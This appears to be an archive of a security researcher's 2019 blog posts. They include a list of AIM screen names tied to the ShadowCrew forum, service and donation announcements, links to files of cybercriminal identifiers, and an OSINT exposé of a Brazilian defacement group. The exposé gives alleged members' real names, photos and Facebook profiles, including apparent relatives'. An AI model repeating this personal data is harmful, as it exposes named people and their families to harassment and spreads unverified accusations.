517196

48721062

47564547

4545

44203686

41781

3727374

362563

35

348140

33342322

332163

330332251

327539466

320455282

320100851

319326887

31485639

304060

29457002

288687540

288670074

266472842

26633491

264975608

2482045

236790331

230406

222567486

222409185

22063094

219747908

21386767

213201784

212719246

19457815

193200333

1881621

179251032
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178954300

178832228

178420526

178210999

178101166

178020075

177541908

177507739

177394922

177016428

176824746

176531816

175688952

175596058

175521773

175350857

175308348

175157730

174902318

174760817

174537112

174511919

174445299

173846049

173838529

173767788

17359522

173387414

173299970

173254582

173019781

173002204

172674035

172476811

172290141

172252866

172021743

171975533

171805992

1715300002

171468368

171440228

170627352

170324565

170036758

169769760

169243371

169220281

169006693

168834059
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168769080

168675160

168595955

168495889

168422846

168413916

167927175

167897380

167636937

167023436

166657595

166581197

166407706

165969755

165638624

165546617

164872312

164165878

164008345

162852265

1601617

158807983

15652907

154866004

152616

150860495

139736678

130915854

11402050

1111111

10966997

107021

105233239

103363810

100631

100161

Sample Public IM User Names of ShadowCrew Cybercrime Forum Community circa 2002-2004:

aim:goim?screenname=youngglobeman &message=Hello+Are+you+there?

aim:goim?screenname=yeezz0r &message=Hello+Are+you+there?

aim:goim?screenname=xkyroutx &message=Hello+Are+you+there?

aim:goim?screenname=wisie459 &message=Hello+Are+you+there?

aim:goim?screenname=whailen &message=Hello+Are+you+there?

aim:goim?screenname=wgrumpke &message=Hello+Are+you+there?
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aim:goim?screenname=verbal0g &message=Hello+Are+you+there?

aim:goim?screenname=unbreakable2009 &message=Hello+Are+you+there?

aim:goim?screenname=TopHolos &message=Hello+Are+you+there?

aim:goim?screenname=thenightmaresx &message=Hello+Are+you+there?

aim:goim?screenname=thelistguysc &message=Hello+Are+you+there?

aim:goim?screenname=theblinkstud182 &message=Hello+Are+you+there?

aim:goim?screenname=Tandrek &message=Hello+Are+you+there?

aim:goim?screenname=t909j &message=Hello+Are+you+there?

aim:goim?screenname=t0astypimp &message=Hello+Are+you+there?

aim:goim?screenname=SpacemanSpiff742 &message=Hello+Are+you+there?

aim:goim?screenname=sp+e+ar+legolas &message=Hello+Are+you+there?

aim:goim?screenname=someguy798 &message=Hello+Are+you+there?

aim:goim?screenname=SomeCallMe+Byrd &message=Hello+Are+you+there?

aim:goim?screenname=Sly+Immigrant &message=Hello+Are+you+there?

aim:goim?screenname=sirnoface &message=Hello+Are+you+there?

aim:goim?screenname=Sir+Aristrotle &message=Hello+Are+you+there?

aim:goim?screenname=shaubarak &message=Hello+Are+you+there?

aim:goim?screenname=shadylady18693 &message=Hello+Are+you+there?

aim:goim?screenname=shady007 &message=Hello+Are+you+there?

aim:goim?screenname=Screen+Serv &message=Hello+Are+you+there?

aim:goim?screenname=ScottScurlock &message=Hello+Are+you+there?

aim:goim?screenname=Sconoscuito &message=Hello+Are+you+there?

aim:goim?screenname=SC+Talos &message=Hello+Are+you+there?

aim:goim?screenname=savemejebus179 &message=Hello+Are+you+there?

aim:goim?screenname=retarded+shit &message=Hello+Are+you+there?

aim:goim?screenname=redundantcheese &message=Hello+Are+you+there?

aim:goim?screenname=redbossaline &message=Hello+Are+you+there?

aim:goim?screenname=rawistravis &message=Hello+Are+you+there?

aim:goim?screenname=psndude1 &message=Hello+Are+you+there?

aim:goim?screenname=progressiveccna &message=Hello+Are+you+there?

aim:goim?screenname=platinum54door &message=Hello+Are+you+there?

aim:goim?screenname=phs2602 &message=Hello+Are+you+there?

aim:goim?screenname=pg043 &message=Hello+Are+you+there?

aim:goim?screenname=perfectids &message=Hello+Are+you+there?

aim:goim?screenname=pbushe000 &message=Hello+Are+you+there?

aim:goim?screenname=overviewband &message=Hello+Are+you+there?

aim:goim?screenname=ourorgasms &message=Hello+Are+you+there?

aim:goim?screenname=Original+Boski &message=Hello+Are+you+there?

aim:goim?screenname=oofzpumba &message=Hello+Are+you+there?

aim:goim?screenname=octane &message=Hello+Are+you+there?

aim:goim?screenname=novidus &message=Hello+Are+you+there?

aim:goim?screenname=NONE &message=Hello+Are+you+there?

aim:goim?screenname=none &message=Hello+Are+you+there?

aim:goim?screenname=Nobelc4t &message=Hello+Are+you+there?

aim:goim?screenname=NiggaDJackingDaHole &message=Hello+Are+you+there?

aim:goim?screenname=na &message=Hello+Are+you+there?

aim:goim?screenname=N/A &message=Hello+Are+you+there?

aim:goim?screenname=mwdropout &message=Hello+Are+you+there?

aim:goim?screenname=mustophamond &message=Hello+Are+you+there?

aim:goim?screenname=mtnhardware121 &message=Hello+Are+you+there?
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aim:goim?screenname=MrUntouchableSC &message=Hello+Are+you+there?

aim:goim?screenname=mrmojorising97 &message=Hello+Are+you+there?

aim:goim?screenname=MonetaryAffairs &message=Hello+Are+you+there?

aim:goim?screenname=Mofia+MG &message=Hello+Are+you+there?

aim:goim?screenname=mikeyb7895 &message=Hello+Are+you+there?

aim:goim?screenname=miamimac305 &message=Hello+Are+you+there?

aim:goim?screenname=meyerc101 &message=Hello+Are+you+there?

aim:goim?screenname=MentalHpscotch &message=Hello+Are+you+there?

aim:goim?screenname=menlochronic &message=Hello+Are+you+there?

aim:goim?screenname=madcarder@aol.com &message=Hello+Are+you+there?

aim:goim?screenname=mach844 &message=Hello+Are+you+there?

aim:goim?screenname=LOSSisback &message=Hello+Are+you+there?

aim:goim?screenname=linuxgeek99 &message=Hello+Are+you+there?

aim:goim?screenname=LinuxDevil &message=Hello+Are+you+there?

aim:goim?screenname=lazystatefan &message=Hello+Are+you+there?

aim:goim?screenname=lady

aim:goim?screenname=kickinhard2002 &message=Hello+Are+you+there?

aim:goim?screenname=jwillvip &message=Hello+Are+you+there?

aim:goim?screenname=johnvd18 &message=Hello+Are+you+there?

aim:goim?screenname=JMOExtremeS10 &message=Hello+Are+you+there?

aim:goim?screenname=jeffsm31337 &message=Hello+Are+you+there?

aim:goim?screenname=jedisgod &message=Hello+Are+you+there?

aim:goim?screenname=jeadien &message=Hello+Are+you+there?

aim:goim?screenname=JCDyer82 &message=Hello+Are+you+there?

aim:goim?screenname=j0ke+y4+mind &message=Hello+Are+you+there?

aim:goim?screenname=IrOnMaN800 &message=Hello+Are+you+there?

aim:goim?screenname=IDLineNTT &message=Hello+Are+you+there?

aim:goim?screenname=iceroot1 &message=Hello+Are+you+there?

aim:goim?screenname=IamOms &message=Hello+Are+you+there?

aim:goim?screenname=iamaballer847 &message=Hello+Are+you+there?

aim:goim?screenname=HRSAFTER &message=Hello+Are+you+there?

aim:goim?screenname=gosuns1965 &message=Hello+Are+you+there?

aim:goim?screenname=globalflux &message=Hello+Are+you+there?

aim:goim?screenname=Frozenct &message=Hello+Are+you+there?

aim:goim?screenname=fonefag &message=Hello+Are+you+there?

aim:goim?screenname=flameboysk8er13 &message=Hello+Are+you+there?

aim:goim?screenname=firewireID &message=Hello+Are+you+there?

aim:goim?screenname=FenderESP &message=Hello+Are+you+there?

aim:goim?screenname=Feces@Poop.org &message=Hello+Are+you+there?

aim:goim?screenname=fdsf &message=Hello+Are+you+there?

aim:goim?screenname=everybodyschild &message=Hello+Are+you+there?

aim:goim?screenname=esolemio &message=Hello+Are+you+there?

aim:goim?screenname=erols26 &message=Hello+Are+you+there?

aim:goim?screenname=ElMariachiMoco &message=Hello+Are+you+there?

aim:goim?screenname=Edgarkrasav &message=Hello+Are+you+there?

aim:goim?screenname=EddieG2277 &message=Hello+Are+you+there?

aim:goim?screenname=ed0wn &message=Hello+Are+you+there?

aim:goim?screenname=drunknsailor1 &message=Hello+Are+you+there?

aim:goim?screenname=dk3 &message=Hello+Are+you+there?

aim:goim?screenname=djdonte69 &message=Hello+Are+you+there?
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aim:goim?screenname=Degauss007 &message=Hello+Are+you+there?

aim:goim?screenname=dEeliriOous &message=Hello+Are+you+there?

aim:goim?screenname=d0l3m1k3 &message=Hello+Are+you+there?

aim:goim?screenname=cyptdog &message=Hello+Are+you+there?

aim:goim?screenname=crommnz &message=Hello+Are+you+there?

aim:goim?screenname=cpuaddict123 &message=Hello+Are+you+there?

aim:goim?screenname=chemist+exposed &message=Hello+Are+you+there?

aim:goim?screenname=CASLUSCLAY@AOL.COM &message=Hello+Are+you+there?

aim:goim?screenname=cardseller420 &message=Hello+Are+you+there?

aim:goim?screenname=Brydenn33 &message=Hello+Are+you+there?

aim:goim?screenname=Boomsicka &message=Hello+Are+you+there?

aim:goim?screenname=Bo0tyM0nster &message=Hello+Are+you+there?

aim:goim?screenname=Bluedevelz &message=Hello+Are+you+there?

aim:goim?screenname=BLaZiNKeWP &message=Hello+Are+you+there?

aim:goim?screenname=blackrob91@aol.com &message=Hello+Are+you+there?

aim:goim?screenname=BlaCkiCe8636 &message=Hello+Are+you+there?

aim:goim?screenname=BlackBagTricks &message=Hello+Are+you+there?

aim:goim?screenname=BigBoi1881 &message=Hello+Are+you+there?

aim:goim?screenname=benjaminbahr &message=Hello+Are+you+there?

aim:goim?screenname=Belace123 &message=Hello+Are+you+there?

aim:goim?screenname=badandy1318 &message=Hello+Are+you+there?

aim:goim?screenname=Ash1kam &message=Hello+Are+you+there?

aim:goim?screenname=Asdf324tt &message=Hello+Are+you+there?

aim:goim?screenname=ar+naf &message=Hello+Are+you+there?

aim:goim?screenname=ApUzIlLa &message=Hello+Are+you+there?

aim:goim?screenname=anonraider &message=Hello+Are+you+there?

aim:goim?screenname=alkoholikboy &message=Hello+Are+you+there?

aim:goim?screenname=airj3r &message=Hello+Are+you+there?

aim:goim?screenname=aftermath1024 &message=Hello+Are+you+there?

aim:goim?screenname=absentdreamerr &message=Hello+Are+you+there?

aim:goim?screenname=45645645 &message=Hello+Are+you+there?

aim:goim?screenname=111111 &message=Hello+Are+you+there?

Let’s show them how it’s done! Send a message at ddanchev@cryptogroup.net to coordinate and discuss! Stay

tuned!

1. https://1.bp.blogspot.com/-izGFehF5J9A/XabtzV0k-1I/AAAAAAAAJgk/p6-b3q4oH-Qwcg7K4TTK6Iuu-Oc9XiFHACLcBGAsYHQ

/s1600/Western_Union_ShadowCrew_Cybercrime_Forum.png
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2.10 November
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New Commercial Security Research OSINT Cybercrime Research and Threat Intelligence Gathering Ser-

vices Portfolio Available On Demand! (2019-11-02 18:14)

Dear blog readers,

I wanted to let everyone know of a currently active commercial portfolio of services that I’m publicly offering

for the purpose of reaching out to colleagues and friends including companies vendors and organizations who might

be interested in working with me for the purpose of obtaining access to never-published before Security Research

analysis reports briefs podcasts and various other commercially obtainable virtual and cyber assets that you and your

organization can take advantage of.

Approach me at - dancho.danchev@hush.com today to discuss!

Key Commercial Services that I’m currently offering include:
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• [1]Security Services

• [2]OSINT Services

• [3]Hacking Services

• [4]Intelligence Services

• [5]Geopolitical Services

Including the following commercial services available on [6]Patreon Community:

• Real-Time Security Consultation

• Security Newsletter

• Cybercrime Blog Post

• Security Podcast

• Malware Analysis

• Threat Intelligence Analysis

• Security Workshop

• OSINT Analysis

• Geopolitical Analysis

• Threat Actor Profiling

• National Security Analysis

• Cyber Jihad Analysis

• Dark Web Intelligence and OSINT Analysis

• Security Presentation

• Cyber Security Business Development

• Red Team Penetration Testing Assessment

• Blue Team Penetration Testing Assessment

• Target of Opportunity Targeting

• Cybercrime Forum Monitoring

• Underground Chatter Monitoring

• Network Deception Consultation

• Military Scenario Building
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• Cyber Warfare Scenario Building

• OSINT Enrichment and Data Mining

• Cyber Warfare Program Estimation

• Weapons System Analysis

• Cyber SIGINT and Cyber Assets Discovery

Stay tuned!

1. https://unit-123.org/security-services

2. https://unit-123.org/osint-services

3. https://unit-123.org/hacking-services

4. https://unit-123.org/intelligence-services

5. https://unit-123.org/geopolitical-services

6. https://www.patreon.com/ddanchev123
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2.11 December
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New Cybertronics - VR for Hackers and Security Experts Dark Web Onion Address (2019-12-02 10:15)

[1]

Dear blog readers,

I wanted to let everyone know that I’ve recently changed the official Dark Web Onion address for my Cybertronics -

VR for Hackers and Security Experts Project including the actual Bitcoin donation address.

G0t Bitcoin? Consider going through the project proposal today - http://lkzihepprlhxtvbutjedoazbsqd4avmif-

hpjms3zuq7itceiu4qajwad.onion/ including to make a possible Bitcoin donation using the following Bitcoin Address:

3J8Jt7XCBGtCL6XRLTWhKfRQBmhhqGs4aP

I wanted to say a big thanks to everyone who approached me in terms of the project including to actually

make a donation. The official schedule release is scheduled for January, 2020 and I’ll make sure to keep everyone

posted on current and future project updates.

Stay tuned!

1. https://1.bp.blogspot.com/-ehaEPpBHRKw/XeTGikGH8TI/AAAAAAAAJxY/ACcKr9yGHPgPWqljSdxE-4Ywa-oqdLb6gCLcBGAsYHQ

/s1600/Cybertronics.png
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Official World Hacker Global Domination Group (WHGDG) Dark Web Onion Launch! (2019-12-02 10:16)

Dear blog readers,

I’ve been spending more time on the Dark Web these days including the active launching of a second Dark

Web Onion and the official launch of the World Hacker Global Domination Group (WHGDG) which is basically a Call

for Papers Call for Participation and Call for Innovation request on behalf of me for the purpose of reaching out to

the U.S Intelligence Community as an independent contractor for the purpose of presenting and eventually getting

funding for a variety of commercial cyber security and hacking including Threat Intelligence and Offensive Cyber

Warfare Projects including the active recruitment of new members.

Check out the Official Dark Web Onion:

http://nexvibpe4xszfx4cp2jldkdyhnjnah5qnckoagoiry3vpyv5eheh55id.onion/

and don’t forget to visit Cy-

bertronics - Virtual Reality Social Network for Hackers and Cyber Security Experts Bitcoin-accepting Project -

http://ca7brwpxmnbssdoh4dfoijyr7zwetob74x3berlvmeekhmkt7zcjdjqd.onion/ and donate today!

How you can participate?

• Visit the Dark Web Onion and go through the Call for Participation Call for Papers and Call for Innovation and

approach me at ddanchev@cryptogroup.net in case you believe that you can contribute with knowledge data
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and expertise including the technical "know-how" to participate in any of the Key Points mentioned in the Dark Web Onion

Stay tuned for a major Web Site update by the end of the week including the production of an extremely popular

Security Podcast Security Vlog and an additional set of never-published before possibly classified and sensitive

Technical Data and Cyber Security and Hacking resources.

Enjoy!
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Dancho Danchev’s Twitter Account - 2010 - Direct Download Link - Historical OSINT (2019-12-02 10:19)

Dear blog readers,

Takes you back doesn’t it? I’ve decided to share with you a [1]direct download link of my old [2]Twitter ac-

count for you to download and go through and to say big thanks to everyone who’s been keeping in touch with me

throughout 2008-2013 including actual research work and related research inquiries.

Consider going through the archive and catching up with some of my research circa 2010-2014 and approach

me - ddanchev@cryptogroup.net with your feedback or just to say hi in case you remember some of the research

which I used to publish back then.

Stay tuned!

1. https://unit-123.org/wp-content/uploads/2019/11/Dancho_Danchev_Tweets_2010-1.zip

2. https://twitter.com/danchodanchev

1077





Join me on Medium! (2019-12-02 10:59)

Dear blog readers,

I wanted to let everyone know that I’ve recently joined [1]Medium and that I intend to post a variety of edito-

rial type of articles on a daily basis including the fact that I was recently featured as a Top Writer in [2]Privacy.

Missing the editorial? Consider going through my old [3]ZDNet Zero Day Blog content archive including the

following recently published editorial type of articles on Medium:

• [4]Assessing U.S Military Cyber Operational Capabilities to Counter Pro-ISIS Internet Infrastructure

• [5]My Involvement in the Top Secret GCHQ “Lovely Horse” Program and the Existence of the Karma Police

• [6]Kaspersky’s Antivirus Products the NSA and U.S National Security — An Analysis

• [7]Assessment of U.S Intelligence Community Cyber Surveillance Programs and Tradecraft — Part One

• [8]How the NSA utilized Iranian Cyber Proxies To Participate in the BOUNDLESS INFORMANT Program?

• [9]Exposing GCHQ’s Top Secret “GORDIAN KNOT” Cyber Defense Sensor Program — An Analysis

• [10]Exposing GCHQ’s URL-Shortening Service and Its Involvement in Iran’s 2009 Election Protests
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Stay tuned!

1. https://medium.com/@danchodanchev

2. https://medium.com/tag/privacy

3. https://www.zdnet.com/meet-the-team/us/dancho-danchev/

4.

https://medium.com/@danchodanchev/assessing-u-s-military-cyber-operational-capabilities-to-counter-pro-i

sis-internet-infrastructure-e4914bd8fb8c

5.

https://medium.com/@danchodanchev/my-involvement-in-the-top-secret-gchq-lovely-horse-program-and-the-exi

stence-of-the-karma-police-daaf08b028a2

6.

https://medium.com/@danchodanchev/my-involvement-in-the-top-secret-gchq-lovely-horse-program-and-the-exi

stence-of-the-karma-police-daaf08b028a2

7. https://medium.com/@danchodanchev/assessment-of-u-s-intelligence-community-cyber-surveillance-programs-and

-tradecraft-part-one-24c29418107b

8.

https://medium.com/@danchodanchev/how-the-nsa-utilized-iranian-cyber-proxies-to-participate-in-the-bound

less-informant-program-e82045d44848

9.

https://medium.com/@danchodanchev/exposing-gchqs-top-secret-gordian-knot-cyber-defense-sensor-program-an

-analysis-db64aa8a62ea

10. https://medium.com/@danchodanchev/exposing-gchqs-url-shortening-service-and-its-involvement-in-iran-s-20

09-election-protests-6c6a9282630
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g0t Bitcoin? - Part Two (2019-12-04 18:15)

Dear blog readers,

I wanted to let you know that I’ve recently changed to a permanent [1]Dark Web Onion address - for my

[2]Cybertronics - Virtual Reality Social Network for Hackers and Security Experts where I’m currently soliciting

Bitcoin donations for the purpose of launching the project in January, 2020.

Got Bitcoin? Consider visiting the Dark Web Onion and making a donation today and stay tuned for the up-

coming updates and actual launch of the project in January, 2020 - http://lkzihepprlhxtvbutjedoazbsqd4avmif-

hpjms3zuq7itceiu4qajwad.onion/

Stay tuned!

1. https://ddanchev.blogspot.com/2019/08/g0t-bitcoin.html

2. https://ddanchev.blogspot.com/2019/12/new-cybertronics-vr-for-hackers-and.html
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Announcing New Hacking Security and Hacktivism-Themed Online Forum Community! Join me Today!

(2019-12-12 19:00)

IFRAME: [1]https://www.youtube.com/embed/naiklltDK1w?feature=player _embedded

Dear blog readers,

I’ve recently launched an extremely popular and comprehensive Hacking and Security possibly Hacktivism-Themed

Online Forum Community called "[2]Security is Futile" using the extremely popular [3]PlushForums Platform consisting of over 193 Hacking and Security Topic Categories.

The initial idea behind launching the community is to spread data information and knowledge and to provoke

discussion into various hot Hacking and Security topics including to solicit high-profile VIP Hacker and Security

Experts to actually join the community and contribute with content.

Official "Security is Futile!" Hacking and Security Forum Community URL:

https://forums.offensive-warfare.com

Stay tuned!

1. https://www.youtube.com/embed/naiklltDK1w?feature=player_embedded

2. https://forums.offensive-warfare.com/

3. https://plushforums.com/
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Announcing Law Enforcement and OSINT Intelligence Operation "Uncle George" - Join Me Today! - Part

Two (2019-12-12 19:12)

Dear blog readers,

I wanted to let you know that I’ve been spending more time doing active Security Industry outreach in terms

of the [1]2019 Cybercrime Forum Data Set and that I’ve already started working with several vendors in terms of

possible OSINT enrichment and actual processing of the data.

Perfect timing to say thanks to Ilya Timchenko and McAfee for actually reaching out and managing to process

the following artifacts from the actual Data Set which I’ve decided to publicly share with everyone who reaches out

and expresses interest in working with me on the Data Set with the idea to possibly assist the Security Community and

Law Enforcement in terms of tracking down the individuals behind these campaigns and actually shutting them down.

Possible Personally Identifiable Artifacts Found in the Actual Data Set Include:

• [2]Cybercriminal Cryptocurrency Addressess

• [3]Cybercriminal Emails

• [4]Cybercriminal ICQ Numbers

• [5]Cybercriminal Phone Numbers

• [6]Cybercriminal QQ IDs
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• [7]Cybercriminal Telegram IDs/[8]Telegram IDs

• [9]Cybercriminal Dark Web Onion Addresses

• [10]Cybercriminal Viber Accounts

• [11]Cybercriminal VK Accounts

• [12]Cybercriminal XMPP Accounts

Including the following massive update courtesy of me including all the publicly obtainable [13]Email Addresses

obtained from the 2019 Cybercrime Forum Data Set including all the publicly obtainable [14]IP Addresses obtained

from the 2019 Cybercrime Forum Data Set which appear to be mostly Socks4/Socks5 and publicly accessible

compromised hosts used for "island-hopping" tactics.

I’ll be posting an updated set of analysis and data regarding the currently ongoing [15]Law Enforcement and

OSINT Intelligence Operation "Uncle George" anytime soon.

Approach me at ddanchev@cryptogroup.net in case you’re interested in working with me on this project or

want to obtain access to the actual Data Set for possible OSINT enrichment and research purposes.

Stay tuned!

1. https://ddanchev.blogspot.com/2019/10/announcing-law-enforcement-and-osint.html

2. https://unit-123.org/wp-content/uploads/2019/12/cryptocurrency.txt

3. https://unit-123.org/wp-content/uploads/2019/12/emails.txt

4. https://unit-123.org/wp-content/uploads/2019/12/emails.txt

5. https://unit-123.org/wp-content/uploads/2019/12/phone.txt

6. https://unit-123.org/wp-content/uploads/2019/12/qq.txt

7. https://unit-123.org/wp-content/uploads/2019/12/telegram1.txt

8. https://unit-123.org/wp-content/uploads/2019/12/telegram2.txt

9. https://unit-123.org/wp-content/uploads/2019/12/tor.txt

10. https://unit-123.org/wp-content/uploads/2019/12/viber.txt

11. https://unit-123.org/wp-content/uploads/2019/12/vk.txt

12. https://unit-123.org/wp-content/uploads/2019/12/xmpp.txt

13. https://unit-123.org/wp-content/uploads/2019/12/Misc_01.txt

14. https://unit-123.org/wp-content/uploads/2019/12/Misc_02.txt

15. https://ddanchev.blogspot.com/2019/10/announcing-law-enforcement-and-osint.html
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Happy Holidays! (2019-12-23 20:08)

Dear blog readers,

It’s been a pleasure and an honor to serve your needs since December, 2005 when I’ve officially opened this

blog while working as a Managing Director for Astalavista.com - The Underground and I sincerely hope that you’ll

continue to find my research informative and quality enough to further recommend my personal blog to friends and

colleagues including to possibly approach me in terms of seeking additional information regarding a particular blog

post or to actually "say hi" and "keep up the good fight" type of message.

My 2020 primary contact points include:

Personal Email - ddanchev@cryptogroup.net

Social Media Accounts - [1]Twitter, [2]LinkedIn, [3]Facebook, [4]Angellist, [5]YouTube, [6]Medium

IM and Skype ID: [7]dancho _danchev _

Web properties that I’m currently running include - [8]Offensive Warfare 2.0 and [9]Unit-123.org

XMPP/OMEMO ID for Real-Time Conversation: 90184@armadillophone.com which is basically compatible with

[10]ChatSecure [11]Conversations and [12]Dino - feel free to install any of these applications in case you’re not using
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them already and feel free to "say hi".

Happy holidays and thanks a lot for everyone who’s been keeping in touch and keeping up the good fight!

Stay tuned!

1. https://twitter.com/dancho_danchev

2. https://linkedin.com/in/danchodanchev

3. https://www.facebook.com/dancho.danchev.1048

4. https://angel.co/dancho-danchev

5. https://www.youtube.com/channel/UC-kG5Hl0irayFMfukwEPKfw

6. https://medium.com/@danchodanchev/

7. https://join.skype.com/invite/cf5gmBfNdeYb

8. https://forums.offensive-warfare.com/

9. https://unit-123.org/

10. https://chatsecure.org/

11. https://conversations.im/

12. https://dino.im/
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Exposing High Tech Brazil Hack Team Mass Web Site Defacement Group - An OSINT Analysis

(2019-12-27 15:38)

It’s been a while since I’ve last posted on quality update further detailing the inner workings of a high-profile and

prominent Web Site Defacement group that has managed to successfully compromise thousands of Web sites

internationally that also includes Bulgaria’s National Security Agency (DANS) - hxxp://dans.org Web site.

In this post I’ll provide actionable intelligence including personally identifiable information on the people and

the gang behind the campaign including an in-depth analysis of their tactics techniques and procedures including

personal photos and social media accounts of the infamous High Tech Brazil Hack Team whose responsible for having

successfully defaced over 5,000 legitimate Web Sites internationally.

Team Members Include:

- crazyduck - Real Name: Fabian de Souza Peralazzo

- otrasher - Email: Otrasher@live.com - Social Media Account - https://twitter.com/b1tchx _

- l34NDR0

- wicked

- live

- Smoker

Sample Photos of High Tech Brazil Hack Team Team Members:
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Twitter Social Media Accounts known to have participate in the campaign:

https://twitter.com/xFellipeCT

https://twitter.com/Kouback _TR _

https://twitter.com/b1tchx _

https://twitter.com/synchr0n1ze

https://twitter.com/aceeeeeeeer

https://twitter.com/HADESUnsekurity

https://twitter.com/slayer _owner

https://twitter.com/Whiskpentest

https://twitter.com/LulzSecRoot

https://twitter.com/unknown _br

https://twitter.com/Atena _Unknown

https://twitter.com/MandrivaL

Personally Identifiable Information on High Tech Brazil Hack Team Team Members:

• synchr0n1ze

Real Name: Bruno Maglia

Facebook Account Profile: https://www.facebook.com/brunoa qnp ; https://www.facebook.com/brunao.maglia

Related

Facebook

Account

Profiles:

https://www.facebook.com/paulasouzzaa;

https://www.facebook.com/francine.maglia

-

https://www.facebook.com/caio.favaratogalvao

-

https://www.facebook.com/keli.favarato - https://www.facebook.com/fabiano.galvao.18

• aceeeeeeeer
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Real Name: Gustavo Gemen

Personal

Photos:

http://imgur.com/zdRoh33

-

http://imgur.com/mQfN8jk,49aNcs6,dCQYCgc,XPtKSAB

;

http://imgur.com/eKWbZDn,lOiHr7A,HKu5Jw8; http://imgur.com/eKWbZDn,lOiHr7A,HKu5Jw8

Facebook Account Profile: https://facebook.com/gustavo.gemen

Related photos:

http://imgur.com/hZDJSNb,PXjcBsR

http://imgur.com/V6YuIBs,B6CgXKo

http://imgur.com/8wmqbGg,ZKUjM1Q,vKECfQf

http://imgur.com/GTliRuI,GLtvIZl,vfyAhuu

Related URLs:

https://www.youtube.com/channel/UCBgeuuT9sdFOOkFoGnt1p6w

https://koubacktr.wordpress.com/

I’ll be soon posting an additional set of details on the High Tech Brazil Hack Team and I’ll be definitely looking

forward to sharing the necessary details with the Security Industry and Law Enforcement in an attempt to track down

and prosecute the individuals behind these campaigns.

Stay tuned!
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